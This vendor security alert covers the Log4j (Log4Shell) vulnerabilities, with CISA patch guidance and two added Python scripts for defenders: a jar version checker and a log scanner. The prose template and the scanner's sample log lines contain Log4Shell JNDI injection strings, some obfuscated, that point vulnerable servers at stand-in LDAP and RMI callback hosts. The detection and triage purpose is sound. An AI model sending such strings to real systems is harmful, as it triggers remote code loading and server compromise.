Corero

Alert: Apache Log4j Vulnerability Could Impact a Third of All Web Servers: Enables Mirai, Muhstik Botnets and Other Malware

Last week security researchers disclosed a vulnerability in Apache Log4j, a logging library written in Java. The library is embedded in a wide range of consumer and enterprise services, websites and applications, as well as in operational technology products, to log security and performance information. The flaw is in the library's JNDI lookup feature: if attacker-controlled text such as a request header containing a string of the form "${jndi:ldap://attacker-host/...}" is written to a log, Log4j resolves the lookup by contacting the attacker's server, which can hand back code for the application to run. Attackers can use this to install remote access tools to steal data, install cryptocurrency miners, deploy ransomware, or enlist the machine in a botnet (which can later be used to launch Distributed Denial of Service (DDoS) attacks). The initial vulnerability is tracked as CVE-2021-44228 in the National Vulnerability Database run by the National Institute of Standards and Technology (NIST). A second and a third Log4j vulnerability were later discovered and assigned CVE-2021-45046 and CVE-2021-45105. At the time of writing, security updates have been issued to patch the first two.

How risky are these vulnerabilities?

With respect to the initial vulnerability, according to Data Breach Today, “It has a 10 severity rating on a scale of 1 to 10, as attackers can remotely exploit it without any input from the victim, and it requires limited technical ability to deploy.” You know a cybersecurity vulnerability is a big deal when mainstream news media reports on it; for example, MSN News reported: “The list of potential victims encompasses nearly a third of all web servers in the world, according to cybersecurity firm Cybereason. Twitter, Amazon, Microsoft, Apple, IBM, Oracle, Cisco, Google, and one of the world’s most popular video games, Minecraft, count themselves among the slew of tech and industry giants running the popular software code that U.S. officials estimate have left hundreds of millions of devices exposed.”

The US government’s Cybersecurity and Infrastructure Security Agency (CISA) is warning organizations to take this vulnerability seriously, and has directed all federal agencies to mitigate it by installing the patches immediately. According to CISA:

  • “On December 10, 2021, Apache released Log4j version 2.15.0 in a security update to address the CVE-2021-44228 vulnerability.
  • (Updated December 15, 2021) On December 13, 2021, Apache released Log4j version 2.16.0 in a security update to address the CVE-2021-45046 vulnerability. A remote attacker can exploit this second Log4j vulnerability to cause a denial-of-service (DOS) condition in certain non-default configurations.
    • Note: affected organizations that have already upgraded to Log4j 2.15.0 will need to upgrade to Log4j 2.16.0 to be protected against both CVE-2021-44228 and CVE-2021-45046.”
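As an added example (not Corero's code and not part of the CISA advisory), the Python script below triages log4j-core jars found on disk against the fixed versions listed above. It assumes Apache's release jars carry an Implementation-Version entry in META-INF/MANIFEST.MF, which they do, and it also encodes Log4j 2.17.0 as the release that fixes CVE-2021-45105, a fact from Apache's own advisory published after the CISA text quoted here. The 2.12.x branch for Java 7 has separate fix releases and is deliberately not modelled; the fixture jars created by demo() are constructed test data.

```python
"""Triage log4j-core jars on disk against the Log4j 2 fix releases.

Added example, not Corero's code. Assumes Apache release jars carry an
Implementation-Version entry in META-INF/MANIFEST.MF. The 2.17.0 threshold
for CVE-2021-45105 goes beyond the CISA text on the page (Apache advisory).
The 2.12.x Java 7 branch has its own fix releases and is not modelled here.
"""
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, int, int]

# (CVE, first release of the 2.x main line that fixes it)
FIXES: List[Tuple[str, Version]] = [
    ("CVE-2021-44228", (2, 15, 0)),
    ("CVE-2021-45046", (2, 16, 0)),
    ("CVE-2021-45105", (2, 17, 0)),  # from Apache's advisory, not from the page
]

_VER_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text: str) -> Optional[Version]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); garbage -> None."""
    m = _VER_RE.match(text.strip())
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or "0"))


def unpatched_cves(version: Version) -> List[str]:
    """CVEs from FIXES that a log4j-core of this version still carries."""
    if version[0] != 2:
        return []  # Log4j 1.x is a different code base; out of scope here
    return [cve for cve, fixed_in in FIXES if version < fixed_in]


def manifest_version(jar_path: str) -> Optional[str]:
    """Read Implementation-Version from the jar's manifest, or None."""
    try:
        with zipfile.ZipFile(jar_path) as zf:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except (zipfile.BadZipFile, KeyError, OSError):
        return None
    for line in manifest.splitlines():
        key, _, value = line.partition(":")
        if key.strip() == "Implementation-Version":
            return value.strip()
    return None


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk `root`; map each log4j-core jar path to the CVEs it still carries.

    Matching on the file name misses Log4j classes shaded into other jars or
    nested inside WAR/EAR archives; those need a search for JndiLookup.class.
    """
    findings: Dict[str, List[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not (name.startswith("log4j-core") and name.endswith(".jar")):
                continue
            path = os.path.join(dirpath, name)
            raw = manifest_version(path)
            ver = parse_version(raw) if raw else None
            # A jar with no readable version still needs a human to look at it
            findings[path] = ["UNKNOWN-VERSION"] if ver is None else unpatched_cves(ver)
    return findings


def make_fixture_jar(path: str, version: str) -> None:
    """Write a minimal jar whose manifest claims `version` (constructed fixture)."""
    parent = os.path.dirname(path)
    if parent:
        os.makedirs(parent, exist_ok=True)
    manifest = f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n"
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", manifest)


def demo() -> Dict[str, List[str]]:
    """Build a throwaway tree with two constructed jars and scan it."""
    with tempfile.TemporaryDirectory() as root:
        nested = os.path.join(root, "app", "WEB-INF", "lib", "log4j-core-2.14.1.jar")
        make_fixture_jar(nested, "2.14.1")
        make_fixture_jar(os.path.join(root, "log4j-core-2.16.0.jar"), "2.16.0")
        return {os.path.basename(p): cves for p, cves in scan_tree(root).items()}


if __name__ == "__main__":
    for jar, cves in demo().items():
        print(f"{jar}: {', '.join(cves) if cves else 'no listed CVEs outstanding'}")
```

Run it against a real server with scan_tree("/") (or the application root) rather than demo(). The file-name match is a quick first pass only: applications that repackage Log4j into a single "fat" jar, or ship it inside a WAR nested in an EAR, will not show up, so a second pass that opens every archive and looks for org/apache/logging/log4j/core/lookup/JndiLookup.class is needed to call a host clean.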

What’s the current and potential impact?

The potential for attackers to wreak havoc with this vulnerability is enormous, because the Apache logging library is so widely used and sits underneath much of the world's technology. Furthermore, some organizations that use Log4j will, unfortunately, not hear about these vulnerabilities, or patch them, for some time; attackers can find those organizations and exploit the flaw for years to come. The damage seen so far can be considered just the “tip of the iceberg.”

Here’s some advice: check for compromise

First of all, assume the worst: there is a high probability that attackers have already probed, and possibly infiltrated, your systems. The patch closes the hole but does not undo any compromise that has already occurred. Therefore, at the same time security teams install the Log4j updates, they should review their networks and applications for signs of intrusion: search web server and application logs for requests carrying JNDI lookup strings (the exploit payload is commonly placed in the User-Agent header, other headers, or request parameters, and attackers obfuscate it with nested lookups and URL-encoding), check for unexpected outbound LDAP or RMI connections from Java hosts, and look for new processes, scheduled tasks, or cryptocurrency miners on servers that run Log4j. A logged payload on its own shows an attempt; a matching outbound connection from the Java process at the same time is what turns it into a likely compromise.
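The Python scanner below, added here as an illustration rather than code from Corero, shows what such a log review looks like in practice. It undoes the obfuscations attackers commonly wrap around the payload (URL-encoding, ${lower:x}/${upper:x} wrappers and the ${lookup:-x} default-value trick) and then extracts the JNDI scheme and callback target from each line, so the targets can be matched against outbound connection records. The sample access-log lines, IP addresses and callback targets are constructed for the example and use documentation address ranges.

```python
"""Scan log lines for Log4Shell (CVE-2021-44228) JNDI lookup payloads.

Added example, not Corero's code. SAMPLE_LOG is constructed test data in
documentation IP ranges; the obfuscation rules cover the forms commonly
seen in exploitation attempts and are not an exhaustive list.
"""
import re
import urllib.parse
from typing import Any, Dict, List, Optional

# ${lower:X} / ${upper:X} evaluate to X (case aside). ${anything:-X} is the
# default-value form (e.g. ${::-j}, ${env:NOPE:-j}) and evaluates to X when the
# lookup fails. Rewriting innermost-first collapses nesting such as
# ${${lower:j}ndi:${lower:l}dap://...} back to ${jndi:ldap://...}.
_CASE_WRAP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_WRAP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The de-obfuscated payload: ${jndi:<scheme>://<target>}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^}\s]+)", re.IGNORECASE)

SAMPLE_LOG: List[str] = [  # constructed; not real traffic
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.66:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:14:02:12 +0000] "GET /?x=${${lower:j}ndi:'
    '${lower:l}dap://203.0.113.66:1389/a} HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '198.51.100.9 - - [10/Dec/2021:14:03:01 +0000] "GET /search?q=%24%7B%24%7B'
    '%3A%3A-j%7Dndi%3Armi%3A%2F%2F198.51.100.20%3A1099%2Fx%7D HTTP/1.1" 200 77 '
    '"-" "Mozilla/5.0"',
    '192.0.2.7 - - [10/Dec/2021:14:03:05 +0000] "GET /index.html HTTP/1.1" 200 '
    '1024 "-" "Mozilla/5.0"',
    '192.0.2.8 - - [10/Dec/2021:14:03:09 +0000] "GET /docs/jndi-ldap.html '
    'HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def normalize(text: str, max_rounds: int = 20) -> str:
    """Undo URL-encoding (twice, for double encoding) and strip lookup wrappers."""
    for _ in range(2):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):  # bounded: payloads can nest wrappers deeply
        stripped = _CASE_WRAP.sub(lambda m: m.group(1), text)
        stripped = _DEFAULT_WRAP.sub(lambda m: m.group(1), stripped)
        if stripped == text:
            break
        text = stripped
    return text


def find_jndi(line: str) -> Optional[Dict[str, Any]]:
    """Return scheme, callback target and de-obfuscated payload, or None."""
    m = _JNDI.search(normalize(line))
    if m is None:
        return None
    return {"scheme": m.group(1).lower(), "target": m.group(2), "payload": m.group(0)}


def scan_lines(lines: List[str]) -> List[Dict[str, Any]]:
    """Run find_jndi over every line; hits carry their 1-based line number."""
    hits: List[Dict[str, Any]] = []
    for line_no, line in enumerate(lines, 1):
        hit = find_jndi(line)
        if hit is not None:
            hit["line_no"] = line_no
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG):
        print(f"line {hit['line_no']}: {hit['scheme']} callback to {hit['target']}")
```

Point scan_lines at real access logs (one string per line) and treat each hit as an attempt to confirm or rule out: the "target" field is the host and port the vulnerable application would have connected to, so it can be matched directly against firewall or NetFlow records from the Java host at that timestamp. A hit with no matching outbound connection is a blocked or failed attempt; a hit with one is a compromise until proven otherwise.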

Does it affect Corero products?

Corero has completed a comprehensive review of all our products to determine whether any of them, and which versions, are impacted by these vulnerabilities. We found that some later versions of our SmartWall Central Management Server (CMS) are affected; all the latest details can be found on the Security Advisories page of Corero’s website, and Corero has already made available new versions of the CMS that remove the vulnerable Log4j library.

If you need further guidance, please contact Corero support for more information.

For over a decade, Corero has been providing state-of-the-art, highly effective, real-time automatic DDoS protection solutions for enterprise, hosting and service provider customers around the world. Our SmartWall® DDoS mitigation solutions protect on-premise, cloud, virtual and hybrid environments. For more on Corero’s flexible deployment models, click here. If you’d like to learn more, please contact us.